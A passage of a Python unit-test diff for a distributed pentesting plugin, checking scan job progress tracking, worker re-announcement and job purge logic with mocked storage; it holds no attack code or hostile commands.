{ + "job_id": "job-A", + "worker_addr": "worker-1", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 60, + "phase": "service_probes", + "ports_scanned": 60, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 1, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 2}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["ignored_live_reason"], "revision_mismatch") + + def test_get_job_progress_ignores_live_from_old_pass(self): + """Mismatched live pass is ignored for the current assignment.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = { + "job-A:worker-1": { + "job_id": "job-A", + "worker_addr": "worker-1", + "pass_nr": 1, + "assignment_revision_seen": 2, + "progress": 60, + "phase": "service_probes", + "ports_scanned": 60, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 2, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 2}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["ignored_live_reason"], "pass_mismatch") + + def 
test_get_job_progress_ignores_malformed_live_payload(self): + """Malformed live rows are ignored instead of crashing reconciliation.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = { + "job-A:worker-1": { + "job_id": "job-A", + "pass_nr": 2, + }, + } + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 2, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 1}, + }, + } + plugin.time.return_value = 100.0 + plugin.P = MagicMock() + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["ignored_live_reason"], "malformed_live") + plugin.P.assert_called() + + def test_publish_live_progress(self): + """_publish_live_progress writes stage-based progress to CStore :live hset.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + + # Mock a local worker with state (port scan partial + fingerprint done) + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(100)), + "open_ports": [22, 80], + "completed_tests": ["fingerprint_completed"], + "done": False, + } + worker.initial_ports = list(range(1, 513)) + + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + + # Mock CStore lookup for pass_nr + plugin.chainstore_hget.return_value = {"job_pass": 3} + + Plugin._publish_live_progress(plugin) + + # Verify hset was called with correct key pattern + plugin.chainstore_hset.assert_called_once() + call_args = plugin.chainstore_hset.call_args + self.assertEqual(call_args.kwargs["hkey"], "test-instance:live") + self.assertEqual(call_args.kwargs["key"], "job-1:node-A") + progress_data = 
call_args.kwargs["value"] + self.assertEqual(progress_data["job_id"], "job-1") + self.assertEqual(progress_data["worker_addr"], "node-A") + self.assertEqual(progress_data["pass_nr"], 3) + self.assertEqual(progress_data["assignment_revision_seen"], 1) + self.assertEqual(progress_data["phase"], "service_probes") + self.assertEqual(progress_data["scan_type"], "network") + self.assertEqual(progress_data["phase_index"], 3) + self.assertEqual(progress_data["total_phases"], 5) + self.assertEqual(progress_data["ports_scanned"], 100) + self.assertEqual(progress_data["ports_total"], 512) + self.assertIn(22, progress_data["open_ports_found"]) + self.assertIn(80, progress_data["open_ports_found"]) + self.assertEqual(progress_data["started_at"], 100.0) + self.assertEqual(progress_data["first_seen_live_at"], 100.0) + self.assertEqual(progress_data["last_seen_at"], 100.0) + self.assertFalse(progress_data["finished"]) + # Stage-based progress: service_probes = stage 3 (idx 2), so 2/5*100 = 40% + self.assertEqual(progress_data["progress"], 40.0) + # Single thread — no threads field + self.assertNotIn("threads", progress_data) + + def test_publish_live_progress_missing_interval_uses_default(self): + """Missing publish interval falls back to the default safely.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + plugin._progress_publish_interval = None + plugin.cfg_progress_publish_interval = None + plugin.CONFIG = {"PROGRESS_PUBLISH_INTERVAL": 30} + + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(10)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker.initial_ports = list(range(1, 33)) + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + 
self.assertEqual(Plugin._get_progress_publish_interval(plugin), 30.0) + plugin.chainstore_hset.assert_called_once() + + def test_publish_live_progress_invalid_interval_uses_default(self): + """Malformed publish interval falls back to the default safely.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 80 + plugin.time.return_value = 100.0 + plugin._progress_publish_interval = None + plugin.cfg_progress_publish_interval = "invalid" + plugin.CONFIG = {"PROGRESS_PUBLISH_INTERVAL": 30} + + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(10)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker.initial_ports = list(range(1, 33)) + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + self.assertEqual(Plugin._get_progress_publish_interval(plugin), 30.0) + plugin.chainstore_hset.assert_not_called() + + def test_publish_live_progress_zero_interval_uses_default(self): + """Zero publish interval falls back to the default instead of tight-looping.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 80 + plugin.time.return_value = 100.0 + plugin._progress_publish_interval = None + plugin.cfg_progress_publish_interval = 0 + plugin.CONFIG = {"PROGRESS_PUBLISH_INTERVAL": 30} + + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(10)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker.initial_ports = list(range(1, 33)) + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + self.assertEqual(Plugin._get_progress_publish_interval(plugin), 30.0) + 
plugin.chainstore_hset.assert_not_called() + + def test_job_write_guarantees_are_detection_only(self): + """Mutable job writes explicitly advertise detection-only semantics.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + + self.assertFalse(Plugin._supports_guarded_job_writes(plugin)) + self.assertEqual(Plugin._get_job_write_guarantees(plugin)["mode"], "detection_only") + self.assertFalse(Plugin._get_job_write_guarantees(plugin)["guarded_writes"]) + + def test_publish_live_progress_multi_thread_phase(self): + """Phase is the earliest active phase; per-thread data is included.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + + # Thread 1: fully done + worker1 = MagicMock() + worker1.state = { + "ports_scanned": list(range(256)), + "open_ports": [22], + "completed_tests": ["fingerprint_completed", "service_info_completed", "web_tests_completed", "correlation_completed"], + "done": True, + } + worker1.initial_ports = list(range(1, 257)) + + # Thread 2: still on port scan (50 of 256 ports) + worker2 = MagicMock() + worker2.state = { + "ports_scanned": list(range(50)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker2.initial_ports = list(range(257, 513)) + + plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + call_args = plugin.chainstore_hset.call_args + progress_data = call_args.kwargs["value"] + # Phase should be port_scan (earliest across threads), not done + self.assertEqual(progress_data["phase"], "port_scan") + # Stage-based: port_scan (idx 0) + sub-progress (306/512 * 20%) = ~12% + self.assertGreater(progress_data["progress"], 10) + self.assertLess(progress_data["progress"], 15) + # Per-thread data should be present (2 threads) + self.assertIn("threads", 
progress_data) + self.assertEqual(progress_data["threads"]["t1"]["phase"], "done") + self.assertEqual(progress_data["threads"]["t2"]["phase"], "port_scan") + self.assertEqual(progress_data["threads"]["t2"]["ports_scanned"], 50) + self.assertEqual(progress_data["threads"]["t2"]["ports_total"], 256) + + def test_publish_live_progress_webapp_phase_metadata(self): + """Graybox live progress publishes explicit scan_type and phase metadata.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + + worker = MagicMock() + worker.state = { + "scan_type": "webapp", + "ports_scanned": [443], + "open_ports": [443], + "completed_tests": ["graybox_auth", "graybox_discovery"], + "done": False, + } + worker.initial_ports = [443] + + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 2} + + Plugin._publish_live_progress(plugin) + + progress_data = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(progress_data["scan_type"], "webapp") + self.assertEqual(progress_data["phase"], "graybox_probes") + self.assertEqual(progress_data["phase_index"], 4) + self.assertEqual(progress_data["total_phases"], 5) + + def test_maybe_launch_jobs_publishes_worker_startup_live_progress(self): + """Assigned worker launch writes an immediate startup record to :live.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.cfg_check_jobs_each = 15 + plugin.ee_addr = "node-A" + plugin.scan_jobs = {} + plugin.completed_jobs_reports = {} + plugin.lst_completed_jobs = [] + plugin._active_execution_identities = {} + plugin._execution_live_meta = {} + plugin._foreign_jobs_logged = set() + plugin._PentesterApi01Plugin__last_checked_jobs = 0 + plugin.time.side_effect = [100.0, 100.0, 100.0] + plugin._normalize_job_record.side_effect 
= lambda job_id, payload, migrate=True: (job_id, payload) + plugin._get_job_config.return_value = {"scan_type": "network"} + plugin.P = MagicMock() + plugin._get_worker_entry = lambda job_id, spec: Plugin._get_worker_entry(plugin, job_id, spec) + plugin._remember_execution_identity = lambda job_id, identity, started_at: Plugin._remember_execution_identity( + plugin, job_id, identity, started_at + ) + plugin._publish_worker_startup_progress = lambda job_id, job_specs, local_jobs, assignment_revision, started_at: ( + Plugin._publish_worker_startup_progress( + plugin, + job_id, + job_specs, + local_jobs, + assignment_revision, + started_at, + ) + ) + + job_specs = { + "job_id": "job-1", + "target": "10.0.0.1", + "job_pass": 2, + "launcher": "node-launcher", + "launcher_alias": "rm1", + "workers": { + "node-A": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 2, + }, + }, + } + plugin.chainstore_hgetall.return_value = {"job-1": job_specs} + + worker = MagicMock() + worker.state = {"scan_type": "network"} + worker.initial_ports = list(range(1, 101)) + local_jobs = {"local-1": worker} + + with patch("extensions.business.cybersec.red_mesh.pentester_api_01.launch_local_jobs", return_value=local_jobs): + Plugin._maybe_launch_jobs(plugin) + + self.assertEqual(plugin.scan_jobs["job-1"], local_jobs) + startup_progress = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(startup_progress["job_id"], "job-1") + self.assertEqual(startup_progress["pass_nr"], 2) + self.assertEqual(startup_progress["assignment_revision_seen"], 2) + self.assertEqual(startup_progress["phase"], "port_scan") + self.assertEqual(startup_progress["started_at"], 100.0) + self.assertEqual(plugin._active_execution_identities["job-1"], ("job-1", 2, "node-A", 2)) + + def test_maybe_launch_jobs_skips_duplicate_execution_identity(self): + """A repeated announce of the same execution identity does not relaunch.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + 
plugin.cfg_instance_id = "test-instance" + plugin.cfg_check_jobs_each = 15 + plugin.ee_addr = "node-A" + plugin.scan_jobs = {"job-1": {"local-1": MagicMock()}} + plugin.completed_jobs_reports = {} + plugin.lst_completed_jobs = [] + plugin._active_execution_identities = {"job-1": ("job-1", 2, "node-A", 2)} + plugin._execution_live_meta = { + "job-1": { + "pass_nr": 2, + "assignment_revision_seen": 2, + "started_at": 95.0, + "first_seen_live_at": 95.0, + }, + } + plugin._foreign_jobs_logged = set() + plugin._PentesterApi01Plugin__last_checked_jobs = 0 + plugin.time.return_value = 100.0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._get_worker_entry = lambda job_id, spec: Plugin._get_worker_entry(plugin, job_id, spec) + + job_specs = { + "job_id": "job-1", + "target": "10.0.0.1", + "job_pass": 2, + "launcher": "node-launcher", + "launcher_alias": "rm1", + "workers": { + "node-A": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 2, + }, + }, + } + plugin.chainstore_hgetall.return_value = {"job-1": job_specs} + + with patch("extensions.business.cybersec.red_mesh.pentester_api_01.launch_local_jobs") as mocked_launch: + Plugin._maybe_launch_jobs(plugin) + + mocked_launch.assert_not_called() + + def test_maybe_reannounce_worker_assignments_retries_unseen_worker_only(self): + """Launcher bumps only the missing worker assignment revision.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_check_jobs_each = 15 + plugin.cfg_distributed_job_reconciliation = { + "STARTUP_TIMEOUT": 30, + "STALE_GRACE": 20, + "MAX_REANNOUNCE_ATTEMPTS": 3, + } + plugin._last_worker_reconcile_check = 0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.time.return_value = 
100.0 + + job_specs = { + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "launcher_alias": "rm1", + "target": "10.0.0.1", + "start_port": 1, + "end_port": 200, + "date_created": 10.0, + "job_config_cid": "QmConfig", + "workers": { + "worker-B": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 1, + "assigned_at": 10.0, + }, + "worker-C": { + "start_port": 101, + "end_port": 200, + "assignment_revision": 1, + "assigned_at": 10.0, + }, + }, + "timeline": [], + "pass_reports": [], + "job_revision": 0, + } + live_payloads = { + "job-1:worker-B": { + "job_id": "job-1", + "worker_addr": "worker-B", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 25.0, + "phase": "service_probes", + "ports_scanned": 25, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 20.0, + "first_seen_live_at": 20.0, + "last_seen_at": 100.0, + }, + } + + def _hgetall(*, hkey): + if hkey == "test-instance": + return {"job-1": dict(job_specs)} + if hkey == "test-instance:live": + return dict(live_payloads) + return {} + + plugin.chainstore_hgetall.side_effect = _hgetall + plugin.chainstore_hget.return_value = dict(job_specs) + + Plugin._maybe_reannounce_worker_assignments(plugin) + + persisted = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(persisted["workers"]["worker-B"]["assignment_revision"], 1) + self.assertEqual(persisted["workers"]["worker-C"]["assignment_revision"], 2) + self.assertEqual(persisted["workers"]["worker-C"]["reannounce_count"], 1) + self.assertEqual(persisted["workers"]["worker-C"]["retry_reason"], "startup_timeout") + self.assertEqual(persisted["timeline"][-1]["type"], "worker_reannounced") + + def test_maybe_reannounce_worker_assignments_retries_stale_worker(self): + """Launcher retries a matched worker whose live state is stale past grace.""" + Plugin = self._get_plugin_class() + plugin = 
MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_check_jobs_each = 15 + plugin.cfg_distributed_job_reconciliation = { + "STARTUP_TIMEOUT": 30, + "STALE_TIMEOUT": 10, + "STALE_GRACE": 20, + "MAX_REANNOUNCE_ATTEMPTS": 3, + } + plugin._last_worker_reconcile_check = 0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.time.return_value = 100.0 + + job_specs = { + "job_id": "job-2", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "launcher_alias": "rm1", + "target": "10.0.0.2", + "start_port": 1, + "end_port": 100, + "date_created": 10.0, + "job_config_cid": "QmConfig", + "workers": { + "worker-C": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 1, + "assigned_at": 10.0, + }, + }, + "timeline": [], + "pass_reports": [], + "job_revision": 0, + } + live_payloads = { + "job-2:worker-C": { + "job_id": "job-2", + "worker_addr": "worker-C", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 10.0, + "phase": "service_probes", + "ports_scanned": 10, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 60.0, + "started_at": 20.0, + "first_seen_live_at": 20.0, + "last_seen_at": 60.0, + }, + } + + def _hgetall(*, hkey): + if hkey == "test-instance": + return {"job-2": dict(job_specs)} + if hkey == "test-instance:live": + return dict(live_payloads) + return {} + + plugin.chainstore_hgetall.side_effect = _hgetall + plugin.chainstore_hget.return_value = dict(job_specs) + + Plugin._maybe_reannounce_worker_assignments(plugin) + + persisted = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(persisted["workers"]["worker-C"]["assignment_revision"], 2) + self.assertEqual(persisted["workers"]["worker-C"]["retry_reason"], "stale_live") + 
self.assertEqual(persisted["timeline"][-1]["type"], "worker_reannounced") + + def test_maybe_reannounce_worker_assignments_stops_job_after_retry_exhaustion(self): + """Launcher stops the job explicitly once a worker exhausts re-announcement budget.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_check_jobs_each = 15 + plugin.cfg_distributed_job_reconciliation = { + "STARTUP_TIMEOUT": 30, + "STALE_GRACE": 20, + "MAX_REANNOUNCE_ATTEMPTS": 3, + } + plugin._last_worker_reconcile_check = 0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.time.side_effect = [100.0, 100.0, 100.0] + + job_specs = { + "job_id": "job-3", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "launcher_alias": "rm1", + "target": "10.0.0.3", + "start_port": 1, + "end_port": 100, + "date_created": 10.0, + "job_config_cid": "QmConfig", + "workers": { + "worker-C": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 4, + "assigned_at": 10.0, + "reannounce_count": 3, + }, + }, + "timeline": [], + "pass_reports": [], + "job_revision": 0, + } + + def _hgetall(*, hkey): + if hkey == "test-instance": + return {"job-3": dict(job_specs)} + if hkey == "test-instance:live": + return {} + return {} + + plugin.chainstore_hgetall.side_effect = _hgetall + plugin.chainstore_hget.return_value = dict(job_specs) + + Plugin._maybe_reannounce_worker_assignments(plugin) + + persisted = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(persisted["job_status"], "STOPPED") + self.assertEqual(persisted["workers"]["worker-C"]["terminal_reason"], "unreachable") + self.assertEqual(persisted["workers"]["worker-C"]["retry_reason"], "startup_timeout") + self.assertIn("worker-C", 
persisted["workers"]["worker-C"]["error"]) + + def test_clear_live_progress(self): + """_clear_live_progress deletes progress keys for all workers.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + Plugin._clear_live_progress(plugin, "job-1", ["worker-A", "worker-B"]) + + self.assertEqual(plugin.chainstore_hset.call_count, 2) + calls = plugin.chainstore_hset.call_args_list + keys_deleted = {c.kwargs["key"] for c in calls} + self.assertEqual(keys_deleted, {"job-1:worker-A", "job-1:worker-B"}) + for c in calls: + self.assertIsNone(c.kwargs["value"]) + + + +class TestPhase14Purge(unittest.TestCase): + """Phase 14: Job Deletion & Purge.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _make_plugin(self): + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + return plugin + + def test_purge_finalized_collects_all_cids(self): + """Finalized purge collects archive + config + aggregated_report + worker report CIDs.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + # CStore stub for a finalized job + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + "job_config_cid": "cid-config", + } + plugin.chainstore_hget.return_value = job_specs + + # Archive contains nested CIDs + archive = { + "passes": [ + { + "aggregated_report_cid": "cid-agg-1", + "worker_reports": { + "worker-A": {"report_cid": "cid-wr-A"}, + "worker-B": {"report_cid": "cid-wr-B"}, + }, + }, + ], + } + plugin.r1fs.get_json.return_value = archive + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.side_effect = [ + {}, + 
{"job-1:f-1": {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk"}}, + {"job-1:f-1": [{"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "timestamp": 1.0}]}, + ] + + # Normalize returns the specs as-is + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # Verify all 5 CIDs were deleted + deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} + self.assertEqual(deleted_cids, {"cid-archive", "cid-config", "cid-agg-1", "cid-wr-A", "cid-wr-B"}) + self.assertEqual(result["cids_deleted"], 5) + self.assertEqual(result["cids_total"], 5) + triage_deletes = { + (c.kwargs["hkey"], c.kwargs["key"]) + for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("value") is None and c.kwargs.get("hkey", "").endswith(":triage") + } + self.assertEqual(triage_deletes, {("test-instance:triage", "job-1:f-1")}) + triage_audit_deletes = { + (c.kwargs["hkey"], c.kwargs["key"]) + for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("value") is None and c.kwargs.get("hkey", "").endswith(":triage:audit") + } + self.assertEqual(triage_audit_deletes, {("test-instance:triage:audit", "job-1:f-1")}) + + def test_purge_finalized_no_pass_report_cids(self): + """Finalized purge does NOT try to delete individual pass report CIDs (they are inside archive).""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + # No pass_reports key — finalized stubs don't have them + } + plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.get_json.return_value = {"passes": []} + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.side_effect = [ + {}, + {"job-1:f-1": {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk"}}, + {"job-1:f-1": [{"job_id": "job-1", "finding_id": 
"f-1", "status": "accepted_risk", "timestamp": 1.0}]}, + ] + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # Only archive CID should be deleted (no pass_reports, no config, no workers) + deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} + self.assertEqual(deleted_cids, {"cid-archive"}) + + def test_purge_running_collects_all_cids(self): + """Stopped (was running) purge collects config + worker CIDs + pass report CIDs + nested CIDs.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "STOPPED", + "job_config_cid": "cid-config", + "workers": { + "node-A": {"finished": True, "canceled": True, "report_cid": "cid-wr-A"}, + }, + "pass_reports": [ + {"report_cid": "cid-pass-1"}, + ], + } + plugin.chainstore_hget.return_value = job_specs + + # Pass report contains nested CIDs + pass_report = { + "aggregated_report_cid": "cid-agg-1", + "worker_reports": { + "node-A": {"report_cid": "cid-pass-wr-A"}, + }, + } + plugin.r1fs.get_json.return_value = pass_report + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.return_value = {} + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} + self.assertEqual(deleted_cids, {"cid-config", "cid-wr-A", "cid-pass-1", "cid-agg-1", "cid-pass-wr-A"}) + + def test_purge_r1fs_failure_keeps_cstore(self): + """Partial R1FS failure leaves CStore intact and returns 'partial' status.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + "job_config_cid": "cid-config", + } + 
plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.get_json.return_value = {"passes": []} + + # First CID deletes ok, second raises + plugin.r1fs.delete_file.side_effect = [True, Exception("disk error")] + + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "partial") + self.assertEqual(result["cids_deleted"], 1) + self.assertEqual(result["cids_failed"], 1) + self.assertEqual(result["cids_total"], 2) + + # CStore should NOT be tombstoned + tombstone_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("value") is None + ] + self.assertEqual(len(tombstone_calls), 0) + + def test_purge_cleans_live_progress(self): + """Purge deletes live progress keys for the job from :live hset.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "STOPPED", + "workers": {"node-A": {"finished": True}}, + } + plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.delete_file.return_value = True + + # Live hset has keys for this job and another + plugin.chainstore_hgetall.return_value = { + "job-1:node-A": {"progress": 100}, + "job-1:node-B": {"progress": 50}, + "job-2:node-C": {"progress": 30}, + } + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # Check that live progress keys for job-1 were deleted + live_delete_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance:live" and c.kwargs.get("value") is None + ] + deleted_keys = {c.kwargs["key"] for c in live_delete_calls} + self.assertEqual(deleted_keys, {"job-1:node-A", "job-1:node-B"}) + # job-2 key should NOT be touched + self.assertNotIn("job-2:node-C", deleted_keys) + + def 
test_purge_success_tombstones_cstore(self): + """After all CIDs deleted, CStore key is tombstoned (set to None).""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + } + plugin.chainstore_hget.return_value = job_specs + plugin.r1fs.get_json.return_value = {"passes": []} + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.return_value = {} + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + result = Plugin.purge_job(plugin, "job-1") + self.assertEqual(result["status"], "success") + + # CStore tombstone: hset(hkey=instance_id, key=job_id, value=None) + tombstone_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance" + and c.kwargs.get("key") == "job-1" + and c.kwargs.get("value") is None + ] + self.assertEqual(len(tombstone_calls), 1) + + def test_stop_and_delete_delegates_to_purge(self): + """stop_and_delete_job marks job stopped then delegates to purge_job.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + plugin.scan_jobs = {} + + job_specs = { + "job_id": "job-1", + "job_status": "RUNNING", + "workers": {"node-A": {"finished": False}}, + } + plugin.chainstore_hget.return_value = job_specs + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + + # Mock purge_job to verify delegation + purge_result = {"status": "success", "job_id": "job-1", "cids_deleted": 3, "cids_total": 3} + plugin.purge_job = MagicMock(return_value=purge_result) + + result = Plugin.stop_and_delete_job(plugin, "job-1") + + # Verify job was marked stopped before purge + hset_calls = [ + c for c in plugin.chainstore_hset.call_args_list + if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("key") == "job-1" + ] + self.assertEqual(len(hset_calls), 1) + saved_specs = hset_calls[0].kwargs["value"] + 
